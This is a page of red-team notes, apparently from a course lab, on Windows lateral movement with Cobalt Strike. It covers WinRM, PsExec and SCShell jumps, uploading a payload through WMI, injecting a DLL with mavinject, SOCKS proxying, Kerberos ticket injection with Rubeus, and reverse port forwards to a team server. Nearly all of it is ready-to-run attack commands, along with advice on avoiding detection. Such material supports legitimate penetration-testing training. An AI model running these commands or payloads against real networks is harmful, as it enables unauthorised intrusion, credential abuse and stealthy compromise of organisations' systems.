Lateral Movement

The Double Hop Problem

After lateral movement via WinRM/PsExec, the new Beacon may fail to authenticate to other domain resources.

Reason: Network logon type doesn't cache credentials in LSASS on the remote target. Both WinRM and PsExec use Network logon type.

# After WinRM lateral movement
powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
powerpick Get-DomainTrust

ERROR: Exception calling "FindOne" with "0" argument(s): "An operations error occurred."

After moving laterally, you only have the service ticket that allowed the connection:

Cached Tickets: (1)

#0>	Client: tmorgan @ INLANEFREIGHT.LOCAL
	Server: HTTP/ilf-ws-1 @ INLANEFREIGHT.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96

Solution: Use impersonation technique (make_token or ptt) to populate the session with credentials.

Or, run enumeration from the original session that already has credential material.

WinRM

Beacon runs in context of current/impersonated user.

# Jump to new Beacon
jump winrm64 ilf-ws-1 smb

# Single command execution
remote-exec winrm ilf-ws-1 net sessions

PsExec

Beacon runs as SYSTEM.

⚠️ LOUD - Service creation is relatively rare and easily detected.

jump psexec64 ilf-ws-1 smb

SCShell (Quieter PsExec)

Modifies an existing service temporarily instead of creating a new one.

Setup: Load C:\Tools\SCShell\CS-BOF\scshell.cna via Cobalt Strike > Script Manager

jump scshell64 ilf-ws-1 smb

WMI

Upload payload and execute via WMI.

# Change to writable share
cd \\ilf-ws-1\ADMIN$

# Upload payload
upload C:\Payloads\smb_x64.exe

# Optionally rename
mv \\ilf-ws-1\ADMIN$\smb_x64.exe \\ilf-ws-1\ADMIN$\hidden.exe

# Execute via WMI
remote-exec wmi ilf-ws-1 C:\Windows\hidden.exe

# Link to new Beacon
link ilf-ws-1 TSVCPIPE-4b2f70b3-ceba-42a5-a4b5-704e1c41337

MavInject (OPSEC Warning)

⚠️ BAD OPSEC - Avoid if possible.

Injects DLL into remote process using signed Microsoft executable.

# List remote processes
remote-exec winrm ilf-ws-1 Get-Process -IncludeUserName | select Id, ProcessName, UserName | sort -Property Id

# Upload DLL to target
cd \\ilf-ws-1\ADMIN$\System32
upload C:\Payloads\smb_x64.dll

# Inject into target process
remote-exec wmi ilf-ws-1 mavinject.exe 1992 /INJECTRUNNING C:\Windows\System32\smb_x64.dll

# Link to new Beacon
link ilf-ws-1 TSVCPIPE-4b2f70b3-ceba-42a5-a4b5-704e1c41337

SOCKS Proxy

Start SOCKS Proxy

socks 1080

Add Targets to Hosts File

Required for Kerberos (needs hostnames):

# Local ops station
Add-Content -Path C:\Windows\System32\drivers\etc\hosts -Value '10.10.120.1 ilf-dc-1'

Proxifier (Windows)

Profile > Proxy Servers - Add team server IP and SOCKS port
Profile > Proxification Rules - Target internal IP range only
Run tools through proxy (e.g., AD Explorer: C:\Tools\SysinternalsSuite\ADExplorer64.exe)

AD Enumeration via SOCKS

# Local ops station
$Cred = Get-Credential INLANEFREIGHT.LOCAL\tmorgan
Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Credential $Cred -Server ilf-dc-1

Kerberos Authentication via SOCKS

Create process with injected ticket:

# Local ops station
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /domain:INLANEFREIGHT.LOCAL /username:tmorgan /password:FakePass /program:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /ticket:C:\Users\Attacker\Desktop\tmorgan.kirbi /show

Request service tickets manually:

# Local ops station
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:ldap/ilf-dc-1 /ticket:C:\Users\Attacker\Desktop\tmorgan.kirbi /dc:ilf-dc-1 /ptt

Import-Module ActiveDirectory
Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Server ilf-dc-1 | select DistinguishedName

Reverse Port Forwards

Forward traffic from compromised host back to team server.

rportfwd [bind port] [forward host] [forward port]

Example: Forward HTTP to Team Server

# Add firewall rule
make_token INLANEFREIGHT\tmorgan Passw0rd!
run netsh advfirewall firewall add rule name="Debug" dir=in action=allow protocol=TCP localport=28190

# Start reverse port forward
rportfwd 28190 localhost 80

# Test from another host
remote-exec winrm ilf-ws-1 iwr http://ilf-wkstn-1:28190/test

Check View > Web Log for incoming requests.

Cleanup

rportfwd stop 28190
run netsh advfirewall firewall delete rule name="Debug"

Quick Reference

Technique

Runs As

OPSEC

Use Case

jump winrm64

Current user

Medium

General lateral movement

jump psexec64

SYSTEM

Loud

Need SYSTEM access

jump scshell64

SYSTEM

Quieter

Avoid service creation

remote-exec wmi

Current user

Medium

Custom payload execution

MavInject

Target process

Bad

Last resort DLL injection

PreviousKerberos Delegation NextMSSQL Attacks

Last updated 1 month ago

hashtagThe Double Hop Problem

hashtagWinRM

hashtagPsExec

hashtagSCShell (Quieter PsExec)

hashtagWMI

hashtagMavInject (OPSEC Warning)

hashtagSOCKS Proxy

hashtagStart SOCKS Proxy

hashtagAdd Targets to Hosts File

hashtagProxifier (Windows)

hashtagAD Enumeration via SOCKS

hashtagKerberos Authentication via SOCKS

hashtagReverse Port Forwards

hashtagExample: Forward HTTP to Team Server

hashtagCleanup

hashtagQuick Reference